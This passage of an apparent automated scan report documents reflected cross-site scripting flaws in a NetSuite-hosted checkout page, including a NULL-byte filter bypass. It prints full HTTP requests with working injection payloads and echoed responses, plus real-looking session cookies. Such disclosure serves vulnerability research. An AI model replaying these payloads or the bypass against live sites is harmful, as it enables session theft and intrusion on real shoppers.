The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

POST /s.nl HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: https://checkout.netsuite.com/s.nl?c=1034828&sc=4&n=3
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Host: checkout.netsuite.com
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: __utma=1.2027734133.1289244024.1289251037.1290273104.3; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); JSESSIONID=LycGMyBNRjjQpg2yQxfl568LH03v7PJ2JZhbrvfVJvqcPnWypyG9MDpC5CBHkTSjvQXJ7XfkxPhrQJbWLwsx4vv2QwMgnpHZ4bfg8R2qCtRQh3R6Q1mQQGCHQQcl4G9c!-548196153; NS_VER=2010.2.0; __utmb=1.1.10.1290273104; __utmc=1; NLVisitorId=rnoX2kNXAZKv7gpK; NLShopperId=rnoX2lhXAQEmkIji; NLShopperId7=rnoX2qVXAQEJBIY6; NLShopperId3=rnoX2q9XAatYKaJC; StoreEmail=rt'@1.com
Content-Length: 270

origsc=4&c=1034828&n=3&sc=4&category=shipping&id=&it=A&vid=rnoX2kNXAZKv7gpK&ck=rnoX2q9XAatYKaJC&cktime=87993&cart=148243&referer=https%3A%2F%2Fcheckout.netsuite.com%2Fs.nl%3Fc%3D1034828%26sc%3D4%26n%3D3&sShipMeth=12440&continueclicked=T&kReferralCode=&submitter=Continue&%009847a'style%3d'x%3aexpression(alert(1))'ba0bac45916=1

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 17:28:55 GMT
Server: Apache
Cache-Control: max-age=300
Pragma: No-Cache
Expires: 0
NS_RTIMER_COMPOSITE: -704998492:616363742D6A6176613038352E7376616C652E6E65746C65646765722E636F6D:80
Set-Cookie: NLShopperId3=rnoX2rlXAayZVN1c; domain=.netsuite.com; expires=Saturday, 27-Nov-2010 17:28:56 GMT; path=/
Set-Cookie: NLShopperId3=rnoX2rlXAayZVN1c; domain=.netsuite.com; expires=Saturday, 27-Nov-2010 17:28:56 GMT; path=/
Set-Cookie: NLShopperId3=rnoX2rlXAayZVN1c; domain=.netsuite.com; expires=Saturday, 27-Nov-2010 17:28:56 GMT; path=/
Set-Cookie: NLShopperId3=rnoX2rlXAayZVN1c; domain=.netsuite.com; expires=Saturday, 27-Nov-2010 17:28:56 GMT; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Keep-Alive: timeout=10, max=984
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 49868


<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>Checkout - Turner</title>


<meta name="robots" content="noindex,nofollow">
<script language='JavaScript' type
...[SNIP]...
<input type='hidden' name='referer' value='https://checkout.netsuite.com/s.nl?.9847a'style='x:expression(alert(1))'ba0bac45916=1&continueclicked=T&kReferralCode=&vid=rnoX2kNXAZKv7gpK&n=3&origsc=4&ck=rnoX2q9XAatYKaJC&sShipMeth=12440&cart=148243&submitter=Continue&cktime=87993'>
...[SNIP]...

1.11. https://checkout.netsuite.com/s.nl [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://checkout.netsuite.com
Path:   /s.nl

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 8bc49'style%3d'x%3aexpression(alert(1))'02b68d32520 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 8bc49'style='x:expression(alert(1))'02b68d32520 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

POST /s.nl HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: https://checkout.netsuite.com/s.nl/c.1034828/n.3/sc.4/category.shipping/.f
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Host: checkout.netsuite.com
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: __utma=1.2027734133.1289244024.1289251037.1290273104.3; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); JSESSIONID=LycGMyBNRjjQpg2yQxfl568LH03v7PJ2JZhbrvfVJvqcPnWypyG9MDpC5CBHkTSjvQXJ7XfkxPhrQJbWLwsx4vv2QwMgnpHZ4bfg8R2qCtRQh3R6Q1mQQGCHQQcl4G9c!-548196153; NS_VER=2010.2.0; __utmb=1.1.10.1290273104; __utmc=1; NLVisitorId=rnoX2kNXAZKv7gpK; NLShopperId=rnoX2lhXAQEmkIji; NLShopperId7=rnoX2qVXAQEJBIY6; NLShopperId3=rnoX2q9XAatYKaJC; StoreEmail=rt'@1.com
Content-Length: 276

origsc=4&c=1034828&n=3&sc=4&category=shipping&id=&it=A&vid=rnoX2kNXAZKv7gpK&ck=rnoX2q9XAatYKaJC&cktime=87993&cart=148243&referer=https%3A%2F%2Fcheckout.netsuite.com%2Fs.nl%3Fc%3D1034828%26sc%3D4%26category%3Dshipping%26n%3D3&sShipMeth=12440&continueclicked=T&kReferralCode=%27&8bc49'style%3d'x%3aexpression(alert(1))'02b68d32520=1

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 17:32:28 GMT
Server: Apache
Cache-Control: max-age=300
Pragma: No-Cache
Expires: 0
NS_RTIMER_COMPOSITE: -1160675152:616363742D6A6176613038352E7376616C652E6E65746C65646765722E636F6D:80
Set-Cookie: NLShopperId3=rnoX2rlXAbAOWAq7; domain=.netsuite.com; expires=Saturday, 27-Nov-2010 17:32:29 GMT; path=/
Set-Cookie: NLShopperId3=rnoX2rlXAbAOWAq7; domain=.netsuite.com; expires=Saturday, 27-Nov-2010 17:32:29 GMT; path=/
Set-Cookie: NLShopperId3=rnoX2rlXAbAOWAq7; domain=.netsuite.com; expires=Saturday, 27-Nov-2010 17:32:29 GMT; path=/
Set-Cookie: NLShopperId3=rnoX2rlXAbAOWAq7; domain=.netsuite.com; expires=Saturday, 27-Nov-2010 17:32:29 GMT; path=/
Set-Cookie: NLShopperId3=rnoX2rlXAbAOWAq7; domain=.netsuite.com; expires=Saturday, 27-Nov-2010 17:32:29 GMT; path=/
Set-Cookie: NLShopperId3=rnoX2rlXAbAOWAq7; domain=.netsuite.com; expires=Saturday, 27-Nov-2010 17:32:29 GMT; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Keep-Alive: timeout=10, max=990
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 52738


<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>Checkout - Turner</title>


<meta name="robots" content="noindex,nofollow">
<script language='JavaScript' type
...[SNIP]...
<input type='hidden' name='referer' value='https://checkout.netsuite.com/s.nl?continueclicked=T&kReferralCode=%27&vid=rnoX2kNXAZKv7gpK&n=3&origsc=4&ck=rnoX2q9XAatYKaJC&sShipMeth=12440&cart=148243&8bc49'style='x:expression(alert(1))'02b68d32520=1&cktime=87993'>
...[SNIP]...

1.12. https://checkout.netsuite.com/s.nl [vid parameter]  previous

Summary

Severity:   High
Confidence:   Certain
Host:   https://checkout.netsuite.com
Path:   /s.nl

Issue detail

The value of the vid request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload be972'><script>alert(1)</script>b07e51e7e4a was submitted in the vid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

POST /s.nl HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: https://checkout.netsuite.com/s.nl/c.1034828/n.3/sc.4/category.shipping/.f
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Host: checkout.netsuite.com
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: __utma=1.2027734133.1289244024.1289251037.1290273104.3; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); JSESSIONID=LycGMyBNRjjQpg2yQxfl568LH03v7PJ2JZhbrvfVJvqcPnWypyG9MDpC5CBHkTSjvQXJ7XfkxPhrQJbWLwsx4vv2QwMgnpHZ4bfg8R2qCtRQh3R6Q1mQQGCHQQcl4G9c!-548196153; NS_VER=2010.2.0; __utmb=1.1.10.1290273104; __utmc=1; NLVisitorId=rnoX2kNXAZKv7gpK; NLShopperId=rnoX2lhXAQEmkIji; NLShopperId7=rnoX2qVXAQEJBIY6; NLShopperId3=rnoX2q9XAatYKaJC; StoreEmail=rt'@1.com
Content-Length: 276

origsc=4&c=1034828&n=3&sc=4&category=shipping&id=&it=A&vid=rnoX2kNXAZKv7gpKbe972'><script>alert(1)</script>b07e51e7e4a&ck=rnoX2q9XAatYKaJC&cktime=87993&cart=148243&referer=https%3A%2F%2Fcheckout.netsuite.com%2Fs.nl%3Fc%3D1034828%26sc%3D4%26category%3Dshipping%26n%3D3&sShipMeth=12440&continueclicked=T&kReferralCode=%2
...[SNIP]...

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 17:49:13 GMT
Server: Apache
Cache-Control: max-age=300
Pragma: No-Cache
Expires: 0
NS_RTIMER_COMPOSITE: 171064755:616363742D6A6176613038352E7376616C652E6E65746C65646765722E636F6D:80
Set-Cookie: JSESSIONID=vXc6MyKZQN6rT2TpmWLlpPYKymvMs21nWLJn4YfbHC2VkbKFCTpgHdWhTsfwVcJvksz6JspzMvTP1cyy1KcnBXLFyTZsMrbl41zBcbgBdFWnZ88bXQMBTxkblSHpT2yd!-548196153; path=/
Set-Cookie: NLVisitorId=rnoX2kNXAZKv7gpKbe972'><script>alert(1)</script>b07e51e7e4a; domain=.netsuite.com; expires=Friday, 11-Nov-2011 17:49:13 GMT; path=/
Set-Cookie: NLShopperId3=rnoX2q9XAatYKaJC; domain=.netsuite.com; expires=Saturday, 27-Nov-2010 17:49:13 GMT; path=/
Set-Cookie: NLShopperId3=rnoX2q9XAatYKaJC; domain=.netsuite.com; expires=Saturday, 27-Nov-2010 17:49:13 GMT; path=/
Set-Cookie: NLShopperId3=rnoX2q9XAatYKaJC; domain=.netsuite.com; expires=Saturday, 27-Nov-2010 17:49:13 GMT; path=/
Set-Cookie: NLShopperId3=rnoX2q9XAatYKaJC; domain=.netsuite.com; expires=Saturday, 27-Nov-2010 17:49:13 GMT; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Keep-Alive: timeout=10, max=949
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 56929


<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>Checkout - Turner</title>


<meta name="robots" content="noindex,nofollow">
<script language='JavaScript' type
...[SNIP]...
<input type='hidden' name='vid' value='rnoX2kNXAZKv7gpKbe972'><script>alert(1)</script>b07e51e7e4a'>
...[SNIP]...

Report generated by XSS.CX at Sat Nov 20 12:45:39 CST 2010.